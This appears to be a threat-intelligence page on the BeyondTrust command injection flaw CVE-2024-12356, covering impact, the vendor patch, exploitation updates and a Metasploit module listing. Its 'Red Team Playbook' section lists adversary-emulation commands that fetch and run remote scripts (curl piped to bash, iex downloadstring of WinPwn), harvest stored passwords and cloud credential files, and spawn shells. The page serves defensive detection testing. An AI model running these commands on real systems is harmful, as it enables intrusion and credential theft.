CVE-2024-12356
Overview
This vulnerability is a command injection flaw rooted in improper input validation within BeyondTrust's Privileged Remote Access and Remote Support products. The flaw allows unauthenticated attackers to inject arbitrary commands executed with site user privileges. The affected components are the remote access and support interfaces that process incoming commands without sufficient sanitization, enabling unauthorized command execution.
Vulnerability Description
A critical vulnerability has been discovered in Privileged Remote Access (PRA) and Remote Support (RS) products which can allow an unauthenticated attacker to inject commands that are run as a site user.
Impact
An unauthenticated attacker can execute arbitrary commands on the affected systems with site user privileges, enabling full control over the remote support environment. This can lead to unauthorized data access, system manipulation, and potential lateral movement within the network. No authentication or user interaction is required, making exploitation trivial and enabling attackers to compromise sensitive infrastructure remotely. The vulnerability has been linked to targeted attacks against high-value government entities, demonstrating its critical impact on confidentiality, integrity, and availability.
Solution
BeyondTrust has released patches addressing this vulnerability as detailed in their security advisory BT24-10, published on December 16, 2024. Users of Privileged Remote Access and Remote Support products should apply the vendor-provided updates immediately to versions released after this date. Detailed patch instructions and advisory information are available at https://www.beyondtrust.com/trust-center/security-advisories/bt24-10. No alternative mitigations or workarounds are specified in the advisory.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
A critical vulnerability has been identified in Privileged Remote Access (PRA) and Remote Support (RS) products, allowing unauthenticated attackers to inject commands that execute with the privileges of a site user. This flaw arises from improper input validation and insufficient authentication mechanisms, enabling malicious actors to bypass security controls. The vulnerability can be exploited through various methods, including sending specially crafted requests to the affected systems, which can lead to unauthorized command execution. The ability to run arbitrary commands poses a significant risk, as attackers can manipulate system configurations, access sensitive data, or even pivot to other systems within the network.
The attack vectors associated with this vulnerability are particularly concerning due to the nature of the affected products. Attackers can exploit this flaw remotely, meaning that they do not require physical access to the network or system. This remote exploitation capability allows for a wide range of potential scenarios. For instance, an attacker could leverage social engineering tactics to trick a legitimate user into accessing a malicious link, which then triggers the command injection. Alternatively, automated scripts could be deployed to scan for vulnerable instances of the PRA and RS products, enabling mass exploitation across multiple organizations. Once the attacker gains access, they can execute commands to install malware, exfiltrate sensitive information, or disrupt services.
The real-world impact of this vulnerability is profound, particularly for organizations that rely on these remote access solutions for critical operations. The high CVSS score of 9.8 indicates the severity of the risk, suggesting that successful exploitation could lead to significant data breaches or operational disruptions. Businesses that utilize these products may face not only immediate financial losses due to theft or damage but also long-term repercussions such as reputational harm, regulatory fines, and loss of customer trust. The potential for attackers to gain footholds within corporate networks amplifies the risk, as they can leverage this access to conduct further attacks or lateral movements within the infrastructure.
To effectively detect and mitigate this vulnerability, organizations should adopt a multi-layered security approach. Regularly updating and patching affected products is crucial, as vendors typically release security updates to address known vulnerabilities. Additionally, implementing robust network segmentation can help limit the potential impact of an attack by isolating critical systems from less secure environments. Organizations should also employ intrusion detection systems (IDS) to monitor for unusual activity indicative of exploitation attempts. Furthermore, conducting regular security assessments and penetration testing can help identify weaknesses in the environment, allowing for proactive remediation before an attacker can exploit them.
In conclusion, the vulnerability in Privileged Remote Access and Remote Support products presents a critical threat that organizations must address promptly. The combination of remote exploitation capabilities and the potential for high-impact consequences necessitates immediate action. By understanding the technical details, potential attack vectors, and real-world implications, organizations can better prepare their defenses. Implementing effective detection and mitigation strategies will be essential in safeguarding sensitive information and maintaining operational integrity in an increasingly complex threat landscape.
CSURFACE threat intelligence has detected a marked escalation in exploitation attempts targeting CVE-2024-12356, coinciding with the recent addition of this vulnerability to the Known Exploited Vulnerabilities (KEV) catalog. Our telemetry indicates the emergence of new proof-of-concept exploits, including a Metasploit module enabling unauthenticated remote code execution against affected BeyondTrust Privileged Remote Access and Remote Support versions. Although the EPSS score remains stable at a high level, the slight upward adjustment reflects growing attacker interest and potential for widespread exploitation. This development elevates the operational risk for organizations running vulnerable versions, as adversaries now possess accessible, automated tools to leverage the critical flaw. Consequently, the threat landscape has intensified, underscoring an urgent need for heightened monitoring and rapid response capabilities to counteract active exploitation efforts.
Update 2 — July 09, 2026
CSURFACE threat intelligence has detected a notable surge in exploitation attempts targeting the critical vulnerability in BeyondTrust Privileged Remote Access and Remote Support products. Our telemetry indicates an increased frequency of command injection activity consistent with unauthenticated remote code execution attempts, reflecting a growing attacker focus on this vector. While the EPSS score remains stable, the uptick in observed exploitation signals a shift from theoretical risk to active operational threat, heightening the urgency for defenders to recognize this vulnerability as a live attack surface. The availability of a Metasploit module continues to lower the barrier for adversaries, facilitating broader exploitation efforts. This escalation underscores a heightened threat level, as attackers increasingly leverage automated tools to compromise vulnerable environments, potentially leading to unauthorized access and lateral movement within targeted networks.
Update 3 — July 18, 2026
CSURFACE threat intelligence has identified a marked escalation in exploitation attempts targeting CVE-2024-12356, with detection activity doubling over recent monitoring periods. This surge reflects a transition from limited probing to more aggressive and frequent attack campaigns, underscoring that adversaries are increasingly prioritizing this vulnerability. While the EPSS score remains high but stable, the sharp increase in telemetry signals a growing operational focus on BeyondTrust Remote Support environments, likely driven by the ease of exploitation afforded by publicly available Metasploit modules. This intensification elevates the threat level from a theoretical or opportunistic risk to a sustained and active threat, increasing the likelihood of successful unauthorized command execution and potential lateral movement within compromised networks. Defenders should recognize that the vulnerability is now a prominent target in the wild, with adversaries leveraging automated tools to expand their foothold rapidly.
Update 4 — August 02, 2026
CSURFACE threat intelligence has identified a marked escalation in exploitation attempts targeting the BeyondTrust Remote Support vulnerability, with telemetry indicating a sustained uptick in attacker activity leveraging the publicly available Metasploit module. This increase reflects a growing operational prioritization by threat actors, suggesting that exploitation efforts are becoming more systematic rather than opportunistic. The persistence and expansion of these attempts underscore an elevated risk of unauthorized command execution within affected environments, potentially facilitating lateral movement and deeper network compromise. Although the EPSS score remains stable, the qualitative surge in exploitation signals a heightened threat environment that demands increased vigilance from defenders, as adversaries continue to refine and automate their attack methodologies against this critical vulnerability.
Affected Products (2)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Beyondtrust | Privileged Remote Access | All |
cpe:2.3:a:beyondtrust:privileged_remote_access:*:*:*:*:*:*:*:*
|
|
|
Beyondtrust | Remote Support | All |
cpe:2.3:a:beyondtrust:remote_support:*:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
Metasploit (1)
| Module | Authors | Rank | Platform | Link |
|---|---|---|---|---|
|
BeyondTrust Privileged Remote Access (PRA) and Remote Support (RS) unauthenticated Remote Code Execution
exploits/linux/http/beyondtrust_pra_rs_unauth_rce
|
sfewer-r7 | Unknown | linux, unix | View |
Threat Feed
16 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Public exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (5)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2024-12356 |
| cve.org |
GitHub CVE
|
https://www.cve.org/CVERecord?id=CVE-2024-12356 |
| beyondtrust.com |
GitHub CVE
|
https://www.beyondtrust.com/trust-center/security-advisories/bt24-10 |
| attackerkb.com |
NVD API
Exploit
Third Party Advisory
|
https://attackerkb.com/topics/G5s8ZWAbYH/cve-2024-12356/rapid7-analysis |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2024-12356 |